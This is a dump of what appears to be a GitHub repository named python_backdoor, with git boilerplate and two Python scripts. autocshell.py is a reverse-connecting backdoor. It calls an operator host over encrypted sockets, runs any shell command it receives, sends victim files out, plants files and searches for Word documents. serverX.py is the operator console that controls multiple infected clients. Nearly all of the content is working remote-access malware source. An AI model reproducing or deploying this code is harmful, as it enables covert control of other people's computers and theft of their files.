├── .gitattributes ├── .gitignore ├── README.md ├── autocshell.py ├── miansha.JPG ├── server.png └── serverX.py /.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto 3 | 4 | # Custom for Visual Studio 5 | *.cs diff=csharp 6 | 7 | # Standard to msysgit 8 | *.doc diff=astextplain 9 | *.DOC diff=astextplain 10 | *.docx diff=astextplain 11 | *.DOCX diff=astextplain 12 | *.dot diff=astextplain 13 | *.DOT diff=astextplain 14 | *.pdf diff=astextplain 15 | *.PDF diff=astextplain 16 | *.rtf diff=astextplain 17 | *.RTF diff=astextplain 18 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | 5 | # C extensions 6 | *.so 7 | 8 | # Distribution / packaging 9 | .Python 10 | env/ 11 | build/ 12 | develop-eggs/ 13 | dist/ 14 | downloads/ 15 | eggs/ 16 | lib/ 17 | lib64/ 18 | parts/ 19 | sdist/ 20 | var/ 21 | *.egg-info/ 22 | .installed.cfg 23 | *.egg 24 | 25 | # PyInstaller 26 | # Usually these files are written by a python script from a template 27 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 28 | *.manifest 29 | *.spec 30 | 31 | # Installer logs 32 | pip-log.txt 33 | pip-delete-this-directory.txt 34 | 35 | # Unit test / coverage reports 36 | htmlcov/ 37 | .tox/ 38 | .coverage 39 | .cache 40 | nosetests.xml 41 | coverage.xml 42 | 43 | # Translations 44 | *.mo 45 | *.pot 46 | 47 | # Django stuff: 48 | *.log 49 | 50 | # Sphinx documentation 51 | docs/_build/ 52 | 53 | # PyBuilder 54 | target/ 55 | 56 | # ========================= 57 | # Operating System Files 58 | # ========================= 59 | 60 | # OSX 61 | # ========================= 62 | 63 | .DS_Store 64 | .AppleDouble 65 | .LSOverride 66 | 67 | # Thumbnails 68 | ._* 69 | 70 | # Files that might appear on external disk 71 | .Spotlight-V100 72 | .Trashes 73 | 74 | # Directories potentially created on remote AFP share 75 | .AppleDB 76 | .AppleDesktop 77 | Network Trash Folder 78 | Temporary Items 79 | .apdisk 80 | 81 | # Windows 82 | # ========================= 83 | 84 | # Windows image file caches 85 | Thumbs.db 86 | ehthumbs.db 87 | 88 | # Folder config file 89 | Desktop.ini 90 | 91 | # Recycle Bin used on file shares 92 | $RECYCLE.BIN/ 93 | 94 | # Windows Installer files 95 | *.cab 96 | *.msi 97 | *.msm 98 | *.msp 99 | 100 | # Windows shortcuts 101 | *.lnk 102 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/az0ne/python_backdoor/5782246f4f83cfe194db61b3d2c2121acc66e535/README.md -------------------------------------------------------------------------------- /autocshell.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | from Crypto.Cipher import AES 4 | import subprocess, socket, base64, time, os, sys 5 | import fnmatch 6 | import wmi 7 | # the block size for the cipher object; must be 16, 24, or 32 for AES 8 | BLOCK_SIZE = 32 9 | 10 | # one-liners to encrypt/encode and decrypt/decode a string 11 | # encrypt with AES, encode with base64 12 | EncodeAES = lambda c, s: base64.b64encode(c.encrypt(s)) 13 | DecodeAES = lambda c, e: c.decrypt(base64.b64decode(e)) 14 | 15 | # generate a random secret key 16 | secret = "HUISA78sa9y&9syYSsJhsjkdjklfs9aR" 17 | 18 | # server config 19 | HOST = 'xx.xx.xx.xx' 20 | PORT = 443 21 | 22 | # session controller 23 | active = False 24 | 25 | # Functions 26 | ########### 27 | 28 | # send data function 29 | def Send(sock, cmd, end="EOFEOFEOFEOFEOFX"): 30 | sock.sendall(EncodeAES(cipher, cmd + end)) 31 | 32 | # receive data function 33 | def Receive(sock, end="EOFEOFEOFEOFEOFX"): 34 | data = "" 35 | l = sock.recv(1024) 36 | while(l): 37 | decrypted = DecodeAES(cipher, l) 38 | data = data + decrypted 39 | if data.endswith(end) == True: 40 | break 41 | else: 42 | l = sock.recv(1024) 43 | return data[:-len(end)] 44 | 45 | # upload file 46 | def Upload(sock, filename): 47 | 48 | filename = unicode(filename , "utf8") 49 | bgtr = True 50 | # file transfer 51 | try: 52 | 53 | f = open(filename, 'rb') 54 | while 1: 55 | fileData = f.read() 56 | if fileData == '': break 57 | # begin sending file 58 | Send(sock, fileData, "") 59 | f.close() 60 | except: 61 | time.sleep(0.1) 62 | # let server know we're done.. 63 | time.sleep(0.8) 64 | Send(sock, "") 65 | time.sleep(0.8) 66 | return "Finished download." 67 | 68 | # download file 69 | def Download(sock, filename): 70 | # file transfer 71 | g = open(filename, 'wb') 72 | # download file 73 | fileData = Receive(sock) 74 | time.sleep(0.8) 75 | g.write(fileData) 76 | g.close() 77 | # let server know we're done.. 78 | return "Finished upload." 79 | def iterfindfiles(path, fnexp): 80 | for root, dirs, files in os.walk(path): 81 | for filename in fnmatch.filter(files, fnexp): 82 | yield os.path.join(root, filename) 83 | def autofind(path): 84 | for filename in iterfindfiles(path, "*.doc"): 85 | f = open(path+'myfind.txt','a') 86 | f.write(filename) 87 | f.close() 88 | def Checkdisk(path): 89 | 90 | c = wmi.WMI () 91 | for disk in c.Win32_LogicalDisk (DriveType=3): 92 | f = open(path+'disk.txt','a') 93 | f.write(disk.Caption) 94 | f.close() 95 | 96 | # main loop 97 | while True: 98 | try: 99 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 100 | s.connect((HOST, PORT)) 101 | 102 | # create a cipher object using the random secret 103 | cipher = AES.new(secret,AES.MODE_CFB) 104 | 105 | # waiting to be activated... 106 | data = Receive(s) 107 | 108 | # activate. 109 | if data == 'Activate': 110 | active = True 111 | Send(s, "\n"+os.getcwd()+">") 112 | 113 | # interactive loop 114 | while active: 115 | 116 | # Receive data 117 | data = Receive(s) 118 | 119 | # check for quit 120 | if data == "quit" or data == "terminate": 121 | Send(s, "quitted") 122 | break 123 | 124 | # check for change directory 125 | elif data.startswith("cd ") == True: 126 | os.chdir(data[3:]) 127 | stdoutput = "" 128 | 129 | # check for download 130 | elif data.startswith("download ") == True: 131 | # Upload the file 132 | stdoutput = Upload(s, data[9:]) 133 | 134 | # check for upload 135 | elif data.startswith("upload ") == True: 136 | # Download the file 137 | stdoutput = Download(s, data[7:]) 138 | elif data.startswith("autofind") ==True: 139 | autofind(data[9:]) 140 | stdoutput = "" 141 | elif data.startswith("checkdisk") ==True: 142 | 143 | Checkdisk(data[10:]) 144 | stdoutput = "" 145 | else: 146 | # execute command 147 | proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) 148 | 149 | # save output/error 150 | stdoutput = proc.stdout.read() + proc.stderr.read() 151 | 152 | # send data 153 | stdoutput = stdoutput+"\n"+os.getcwd()+">" 154 | stdoutput = stdoutput.decode('gbk').encode('utf-8') 155 | Send(s, stdoutput) 156 | 157 | # loop ends here 158 | 159 | if data == "terminate": 160 | break 161 | time.sleep(3) 162 | except socket.error: 163 | s.close() 164 | time.sleep(10) 165 | continue 166 | -------------------------------------------------------------------------------- /miansha.JPG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/az0ne/python_backdoor/5782246f4f83cfe194db61b3d2c2121acc66e535/miansha.JPG -------------------------------------------------------------------------------- /server.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/az0ne/python_backdoor/5782246f4f83cfe194db61b3d2c2121acc66e535/server.png -------------------------------------------------------------------------------- /serverX.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from Crypto.Cipher import AES 4 | import socket, base64, os, time, sys, select 5 | 6 | # the block size for the cipher object; must be 16, 24, or 32 for AES 7 | BLOCK_SIZE = 32 8 | 9 | # one-liners to encrypt/encode and decrypt/decode a string 10 | # encrypt with AES, encode with base64 11 | EncodeAES = lambda c, s: base64.b64encode(c.encrypt(s)) 12 | DecodeAES = lambda c, e: c.decrypt(base64.b64decode(e)) 13 | 14 | # generate a random secret key 15 | secret = "HUISA78sa9y&9syYSsJhsjkdjklfs9aR" 16 | 17 | # clear function 18 | ################################## 19 | # Windows ---------------> cls 20 | # Linux ---------------> clear 21 | clear = lambda: os.system('clear') 22 | 23 | # initialize socket 24 | c = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 25 | c.bind(('0.0.0.0', 443)) 26 | c.listen(128) 27 | 28 | # client information 29 | active = False 30 | clients = [] 31 | socks = [] 32 | interval = 0.8 33 | 34 | # Functions 35 | ########### 36 | 37 | # send data 38 | def Send(sock, cmd, end="EOFEOFEOFEOFEOFX"): 39 | sock.sendall(EncodeAES(cipher, cmd + end)) 40 | 41 | # receive data 42 | def Receive(sock, end="EOFEOFEOFEOFEOFX"): 43 | data = "" 44 | l = sock.recv(1024) 45 | while(l): 46 | decrypted = DecodeAES(cipher, l) 47 | data += decrypted 48 | if data.endswith(end) == True: 49 | break 50 | else: 51 | l = sock.recv(1024) 52 | return data[:-len(end)] 53 | 54 | # download file 55 | def download(sock, remote_filename, local_filename=None): 56 | # check if file exists 57 | if not local_filename: 58 | local_filename = remote_filename 59 | try: 60 | f = open(local_filename, 'wb') 61 | except IOError: 62 | print "Error opening file.\n" 63 | Send(sock, "cd .") 64 | return 65 | # start transfer 66 | Send(sock, "download "+remote_filename) 67 | print "Downloading: " + remote_filename + " > " + local_filename 68 | time.sleep(interval) 69 | fileData = Receive(sock) 70 | print "> File size: " + str(len(fileData)) 71 | time.sleep(interval) 72 | f.write(fileData) 73 | time.sleep(interval) 74 | f.close() 75 | 76 | # upload file 77 | def upload(sock, local_filename, remote_filename=None): 78 | # check if file exists 79 | if not remote_filename: 80 | remote_filename = local_filename 81 | try: 82 | g = open(local_filename, 'rb') 83 | except IOError: 84 | print "Error opening file.\n" 85 | Send(sock, "cd .") 86 | return 87 | # start transfer 88 | Send(sock, "upload "+remote_filename) 89 | print 'Uploading: ' + local_filename + " > " + remote_filename 90 | while True: 91 | fileData = g.read() 92 | if not fileData: break 93 | Send(sock, fileData, "") 94 | print "File size: " + str(len(fileData)) 95 | g.close() 96 | time.sleep(interval) 97 | Send(sock, "") 98 | time.sleep(interval) 99 | 100 | # refresh clients 101 | def refresh(): 102 | clear() 103 | print '\nListening for clients...\n' 104 | if len(clients) > 0: 105 | for j in range(0,len(clients)): 106 | print '[' + str((j+1)) + '] Client: ' + clients[j] + '\n' 107 | else: 108 | print "...\n" 109 | # print exit option 110 | print "---\n" 111 | print "[0] Exit \n" 112 | print "\nPress Ctrl+C to interact with client." 113 | 114 | 115 | # main loop 116 | while True: 117 | refresh() 118 | # listen for clients 119 | try: 120 | # set timeout 121 | c.settimeout(10) 122 | 123 | # accept connection 124 | try: 125 | s,a = c.accept() 126 | except socket.timeout: 127 | continue 128 | 129 | # add socket 130 | if (s): 131 | s.settimeout(None) 132 | socks += [s] 133 | clients += [str(a)] 134 | 135 | # display clients 136 | refresh() 137 | 138 | # sleep 139 | time.sleep(interval) 140 | 141 | except KeyboardInterrupt: 142 | 143 | # display clients 144 | refresh() 145 | 146 | # accept selection --- int, 0/1-128 147 | activate = input("\nEnter option: ") 148 | 149 | # exit 150 | if activate == 0: 151 | print '\nExiting...\n' 152 | for j in range(0,len(socks)): 153 | socks[j].close() 154 | sys.exit() 155 | 156 | # subtract 1 (array starts at 0) 157 | activate -= 1 158 | 159 | # clear screen 160 | clear() 161 | 162 | # create a cipher object using the random secret 163 | cipher = AES.new(secret,AES.MODE_CFB) 164 | print '\nActivating client: ' + clients[activate] + '\n' 165 | active = True 166 | Send(socks[activate], 'Activate') 167 | 168 | # interact with client 169 | while active: 170 | try: 171 | # receive data from client 172 | data = Receive(socks[activate]) 173 | # disconnect client. 174 | except: 175 | print '\nClient disconnected... ' + clients[activate] 176 | # delete client 177 | socks[activate].close() 178 | time.sleep(0.8) 179 | socks.remove(socks[activate]) 180 | clients.remove(clients[activate]) 181 | refresh() 182 | active = False 183 | break 184 | 185 | # exit client session 186 | if data == 'quitted': 187 | # print message 188 | print "Exit.\n" 189 | # remove from arrays 190 | socks[activate].close() 191 | socks.remove(socks[activate]) 192 | clients.remove(clients[activate]) 193 | # sleep and refresh 194 | time.sleep(0.8) 195 | refresh() 196 | active = False 197 | break 198 | # if data exists 199 | elif data != '': 200 | # get next command 201 | sys.stdout.write(data) 202 | nextcmd = raw_input() 203 | 204 | # download 205 | if nextcmd.startswith("download ") == True: 206 | if len(nextcmd.split(' ')) > 2: 207 | download(socks[activate], nextcmd.split(' ')[1], nextcmd.split(' ')[2]) 208 | else: 209 | download(socks[activate], nextcmd.split(' ')[1]) 210 | 211 | # upload 212 | elif nextcmd.startswith("upload ") == True: 213 | if len(nextcmd.split(' ')) > 2: 214 | upload(socks[activate], nextcmd.split(' ')[1], nextcmd.split(' ')[2]) 215 | else: 216 | upload(socks[activate], nextcmd.split(' ')[1]) 217 | 218 | # normal command 219 | elif nextcmd != '': 220 | Send(socks[activate], nextcmd) 221 | --------------------------------------------------------------------------------